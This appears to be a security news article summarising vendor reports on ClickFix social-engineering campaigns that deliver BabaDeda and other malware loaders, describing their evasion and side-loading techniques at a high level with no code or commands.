Recent cybersecurity analyses have identified a surge in ClickFix campaigns deploying advanced malware loaders, notably BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. These developments have been detailed in reports from security firms such as Morphisec, BlueVoyant, and Huntress.
In April 2026, BabaDeda Loader was observed targeting educational and financial institutions. This loader, an evolution of earlier BabaDeda activities, now exhibits enhanced stealth, evasion capabilities, and payload flexibility. The attack initiates through a ClickFix social engineering tactic, tricking users into executing malicious PowerShell commands. Once activated, the loader employs techniques like hidden PowerShell scripts, in-memory shellcode execution, DLL side-loading, and external payload storage to deploy information stealers and remote access trojans (RATs).
Originally documented by Morphisec in November 2021, BabaDeda was associated with campaigns targeting the cryptocurrency and Web3 sectors, distributing information stealers, RATs, and LockBit ransomware. The loader’s current iteration profiles the host system, avoids execution on Russian or Belarusian machines, and checks for security products before injecting the main payload into trusted Windows processes like “svchost.exe.” The deployed malware can collect system information, extract browser data, traverse directories, capture screenshots, execute shell commands, and communicate with command-and-control servers over encrypted channels.
Another attack vector involves a ZIP archive utilizing DLL side-loading to deploy DanaBot and SectopRAT (also known as ArechClient). These attacks feature a staged loader component called Storage Crypter, which reads payloads from external files such as “List.Control.dat.” This method conceals malicious payloads within legitimate-looking application packages, decoding them just before execution to evade detection and complicate forensic analysis.
These findings highlight the evolution of modern loader frameworks, which have become increasingly modular. By separating delivery, storage, execution, and payload deployment into distinct components, these frameworks enhance their effectiveness and stealth.
Additionally, ClickFix techniques have been observed in campaigns using compromised WordPress sites as launch points. These campaigns employ deceptive lures, including fake update prompts, to trick users into executing malicious commands, leading to malware infections.
The continuous advancement of ClickFix campaigns underscores the need for heightened vigilance and robust cybersecurity measures. Organizations should educate users about social engineering tactics, implement advanced threat detection systems, and maintain up-to-date security protocols to mitigate these evolving threats.
